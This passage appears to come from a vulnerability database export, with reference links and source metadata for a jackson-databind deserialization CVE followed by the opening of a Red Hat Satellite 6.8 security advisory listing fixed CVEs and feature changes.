"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157859/red-hat-security-advisory-2020-2333-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-denial-of-service-via-bus-proxy-rmiprovider-serialization-gadgets-typing-32061"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157322/red-hat-security-advisory-2020-1523-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/160601/red-hat-security-advisory-2020-5625-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1882/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4471/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159724/red-hat-security-advisory-2020-4366-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1399/"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48376"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:5625"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14195"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10172"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5217"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14195"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8161"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7942"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5216"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.rhsso\u0026downloadtype=distributions\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2020:1414"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2333"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/19/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10688"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xeap-cd\u0026downloadtype=securitypatches\u0026version\u0019"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1732"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.8/html/release_notes_for_red_hat_process_automation_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhpam\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product\\xdata.grid\u0026downloadtype=securitypatches\u0026version=7.3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9488"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3779"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1695"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10714"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/7.3/html/red_hat_data_grid_7.3_release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-7658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1748"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.fuse\u0026version=7.7.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12086"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4970"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1953"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9827"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3831"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-12541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3192"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3797"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:1523"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163499"
},
{
"db": "VULMON",
"id": "CVE-2020-10968"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
},
{
"db": "NVD",
"id": "CVE-2020-10968"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-163499",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-10968",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-10968",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-03-26T00:00:00",
"db": "VULHUB",
"id": "VHN-163499",
"ident": null
},
{
"date": "2020-03-26T00:00:00",
"db": "VULMON",
"id": "CVE-2020-10968",
"ident": null
},
{
"date": "2020-05-18T16:42:53",
"db": "PACKETSTORM",
"id": "157741",
"ident": null
},
{
"date": "2020-10-27T16:58:42",
"db": "PACKETSTORM",
"id": "159724",
"ident": null
},
{
"date": "2020-12-17T18:09:37",
"db": "PACKETSTORM",
"id": "160601",
"ident": null
},
{
"date": "2020-05-28T16:22:46",
"db": "PACKETSTORM",
"id": "157859",
"ident": null
},
{
"date": "2020-07-29T17:53:05",
"db": "PACKETSTORM",
"id": "158651",
"ident": null
},
{
"date": "2020-09-17T14:07:40",
"db": "PACKETSTORM",
"id": "159208",
"ident": null
},
{
"date": "2020-07-29T00:05:59",
"db": "PACKETSTORM",
"id": "158636",
"ident": null
},
{
"date": "2020-04-21T14:19:58",
"db": "PACKETSTORM",
"id": "157322",
"ident": null
},
{
"date": "2020-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1625",
"ident": null
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003420",
"ident": null
},
{
"date": "2020-03-26T13:15:12.970000",
"db": "NVD",
"id": "CVE-2020-10968",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-163499",
"ident": null
},
{
"date": "2021-12-07T00:00:00",
"db": "VULMON",
"id": "CVE-2020-10968",
"ident": null
},
{
"date": "2022-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1625",
"ident": null
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003420",
"ident": null
},
{
"date": "2024-11-21T04:56:28.520000",
"db": "NVD",
"id": "CVE-2020-10968",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "FasterXML jackson-databind Unreliable data deserialization vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
}
],
"trust": 0.6
}
}
VAR-202003-1784
Vulnerability from variot - Updated: 2026-03-09 20:04FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. An attacker could exploit this vulnerability with a specially crafted request to execute arbitrary code on the system. Description:
Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Satellite 6.8 release Advisory ID: RHSA-2020:4366-01 Product: Red Hat Satellite 6 Advisory URL: https://access.redhat.com/errata/RHSA-2020:4366 Issue date: 2020-10-27 CVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781 CVE-2019-16782 CVE-2020-5216 CVE-2020-5217 CVE-2020-5267 CVE-2020-7238 CVE-2020-7663 CVE-2020-7942 CVE-2020-7943 CVE-2020-8161 CVE-2020-8184 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10693 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195 CVE-2020-14334 CVE-2020-14380 ==================================================================== 1. Summary:
An update is now available for Red Hat Satellite 6.8 for RHEL 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Satellite 6.7 - noarch, x86_64 Red Hat Satellite Capsule 6.8 - noarch, x86_64
- Description:
Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool.
Security Fix(es):
- mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018) (CVE-2018-3258)
- netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling (CVE-2020-7238)
- rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7663)
- puppet: puppet server and puppetDB may leak sensitive information via metrics API (CVE-2020-7943)
- jackson-databind: multiple serialization gadgets (CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)
- foreman: unauthorized cache read on RPM-based installations through local user (CVE-2020-14334)
- Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover (CVE-2020-14380)
- Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS (CVE-2019-12781)
- rubygem-rack: hijack sessions by using timing attacks targeting the session id (CVE-2019-16782)
- rubygem-secure_headers: limited header injection when using dynamic overrides with user input (CVE-2020-5216)
- rubygem-secure_headers: directive injection when using dynamic overrides with user input (CVE-2020-5217)
- rubygem-actionview: views that use the
jorescape_javascriptmethods are susceptible to XSS attacks (CVE-2020-5267) - puppet: Arbitrary catalog retrieval (CVE-2020-7942)
- rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)
- rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names (CVE-2020-8184)
- hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
- puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL (CVE-2018-11751)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
-
Provides the Satellite Ansible Modules that allow for full automation of your Satellite configuration and deployment.
-
Adds ability to install Satellite and Capsules and manage hosts in a IPv6 network environment
-
Ansible based Capsule Upgrade automation: Ability to centrally upgrade all of your Capsule servers with a single job execution.
-
Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest version of Puppet
-
Support for HTTP UEFI provisioning
-
Support for CAC card authentication with Keycloak integration
-
Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8 using the LEAPP based tooling.
-
Support for Red Hat Enterprise Linux Traces integration
-
satellite-maintain & foreman-maintain are now self updating
-
Notifications in the UI to warn users when subscriptions are expiring.
The items above are not a complete list of changes. This update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
